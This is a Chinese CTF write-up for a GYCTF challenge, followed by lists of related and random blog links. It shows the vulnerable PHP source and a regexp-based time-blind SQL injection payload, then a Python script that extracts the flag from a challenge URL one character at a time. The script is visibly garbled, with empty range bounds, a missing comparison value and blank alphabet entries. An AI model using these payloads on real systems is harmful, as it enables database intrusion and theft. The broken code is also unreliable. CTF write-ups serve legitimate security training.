考点:regexp注入+时间盲注

源码:

<?php

    # flag在fl4g里

    include 'waf.php';

    header("Content-type: text/html; charset=utf-8");

    $db = new mysql();

    $id = $_GET['id'];

    if ($id) {

        if(check_sql($id)){

            exit();

        } else {

            $sql = "select * from flllllllag where id=$id";

            $db->query($sql);

        }

    }

    highlight_file(__FILE__);

union select  '  =  都ban了,但sleep()没ban

考虑regexp代替 =  的时间盲注

?id=1 or if((length (datanase()) regexp 5, sleep(5),1)

exp:
#脚本来源https://www.gem-love.com/ctf/1669.html#i-2
import requests

import time

import datetime

from urllib.parse import quote

url = "http://2c2d306b5d6745be846972da7fd262b6e3668d53fa124de3.changame.ichunqiu.com/?id=111"

alphabet = ['?','!',',','|','[',']','{','}','_','/','*','-','+','&',"%",'#','@','$','~','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','','','','','','','','','','']

target = 'fl4g'

result = ''

print('www.gem-love.com')

for i in range (,):

    for char in alphabet:

        # 设置payload

        payload =' or if((substr(({}),{},1) regexp "^{}"),sleep(3),1)'.format(target, i, char)

        # 计算响应时长

        start = int(time.time())

        r = requests.get(url+quote(payload))

        response_time = int(time.time()) - start

        if response_time >= :

            result += char

            print('Found: {}'.format(result))

            break
												


											
GYCTF  盲注【regexp注入+时间盲注】的更多相关文章
	

    
								
  1. ctfhub技能树—sql注入—时间盲注
		
    打开靶机 查看页面信息 测试时间盲注 可以看到在执行命令后会有一定时间的等待,确定为时间盲注 直接上脚本 1 #! /usr/bin/env python 2 # _*_ coding:utf-8 _ ...
    
		
    2. 
						
  2. SQL注入之Sqli-labs系列第九关和第十关(基于时间盲注的注入)
		
    开始挑战第九关(Blind- Time based- Single Quotes- String)和第十关( Blind- Time based- Double Quotes- String) gog ...
    
		
    3. 
						
  3. WEB安全--高级sql注入,爆错注入,布尔盲注,时间盲注
		
    1.爆错注入 什么情况想能使用报错注入------------页面返回连接错误信息 常用函数 updatexml()if...floorextractvalue updatexml(,concat() ...
    
		
    4. 
						
  4. 依托http-headers的 sql注入和时间盲注
		
    机缘巧合接触了一点关于sql注入的网络安全问题 依托 headers 的 sql 注入 一般来说大家都很清楚用户输入的危险性,通常会对用户表单提交的数据进行过滤(引号转码). 但是如果写过网络爬虫,那 ...
    
		
    5. 
						
  5. 实验吧——who are you?(insert into注入  二分法 时间盲注)
		
    题目地址:http://ctf5.shiyanbar.com/web/wonderkun/index.php 根据提示  “我要把攻击我的人都记录db中去!”  猜测这是insert into注入,会 ...
    
		
    6. 
						
  6. sql注入--bool盲注,时间盲注
		
    盲注定义: 有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注. 布尔盲注: 布尔盲注只有true跟false,也就是说它根据你的注入信息 ...
    
		
    7. 
						
  7. SQL注入之Sqli-labs系列第十五关和第十六关(基于POST的时间盲注)
		
    开始挑战第十五关(Blind- Boolian Based- String)和 第十六关(Blind- Time Based- Double quotes- String) 访问地址,输入报错语句 ' ...
    
		
    8. 
						
  8. SQLi-Labs之1~6关 - 常规注入与盲注
		
    年初五 财神入 第一关 联合注入 1.准备 2.加'截断 3.order by 判断查询列数 4.同上 5.联合查询判断字段位置 6.查数据库名 7.1 查表名 7.2 查列名 8.查数据 第二关 不 ...
    
		
    9. 
						
  9. sqli-labs(五)——盲注(boolean盲注以及时间盲注)
		
    第八关: 没有查询信息,输入id=1' 报错 ,也没有报错信息,这里应该是个盲注 使用boolean的盲注吧 先判断boolean的盲注可行 输入id=1' and '1'='1' %23 页面正常  ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. mysql   ----  Host '' is not allowed to connect to this MySQL server
			
    mysql>use mysql mysql>update user set host= '%' where user = 'root'; 此时如果提示报错,不用管,继续往下走 select ...
    
			
    2. 
						
  2. 教你如何用Vue自己实现一个message插件
			
    今天我们来自己动手用实现一个message插件: Vue.js 的插件应该暴露一个 install 方法.这个方法的第一个参数是 Vue 构造器,第二个参数是一个可选的选项对象: //message. ...
    
			
    3. 
						
  3. [译]Android  Studio 3.6 新特性概览
			
    设计 设计编辑器 设计编辑器(比如布局编辑器和导航编辑器)现在提供了一个拆分视图模式,能够同时查看 UI 界面的 Design 视图和 Code 视图.拆分视图取代并改进了早期的预览窗口,并且可以对每 ...
    
			
    4. 
						
  4. 【5min+】后台任务的积木。.NetCore中的IHostedService
			
    系列介绍 [五分钟的dotnet]是一个利用您的碎片化时间来学习和丰富.net知识的博文系列.它所包含了.net体系中可能会涉及到的方方面面,比如C#的小细节,AspnetCore,微服务中的.net ...
    
			
    5. 
						
  5. jQuery--dataTable 前端分页与后端分页 及遇到的问题
			
    (1)区别 前端分页:一次性把所有数据全都放在前端,由前端进行处理:适合请求的数据量不大的情况 后端分页:服务器模式,所有的分页,搜索,排序等操作在服务器端完成,然后前端去请求数据:适合量大的情况 ( ...
    
			
    6. 
						
  6. C#模拟POST上传文件帮助类(支持https、http)
			
    public static int PostFile(string getUrl, CookieContainer cookieContainer, HttpHeader header, string ...
    
			
    7. 
						
  7. spring cloud springboot 框架源码 activiti工作流 前后分离 集成代码生成器
			
    1.代码生成器: [正反双向](单表.主表.明细表.树形表,快速开发利器)freemaker模版技术 ,0个代码不用写,生成完整的一个模块,带页面.建表sql脚本.处理类.service等完整模块2. ...
    
			
    8. 
						
  8. 封装好通用的reset.css  base.css 样式重置css文件
			
    一般是叫reset.css 我这边命名成base.css 哎呀无所谓…… @charset "UTF-8"; /*css reset*/ /*清除内外边距*/ body, h1,  ...
    
			
    9. 
						
  9. 学习了解CSS3发展方向和CSS样式与优先级
			
    通过学习CSS3游戏介绍.CSS样式和优先级章节,了解到html5+css3+js不光可以实现动画,其次可以往这个游戏与建模方向发展,更多css3特效访问Gerard Ferrandez on Cod ...
    
			
    10. 
						
  10. Linux btrfs文件系统
			
    btrfs,它名字挺多:B-tree fs;Butter fs;Better fs 开源协议是GPL,2007年由Oracle研发 核心特性: 多物理卷支持,btrfs可由多个物理卷组成:支持RAID ...
    
			
    11.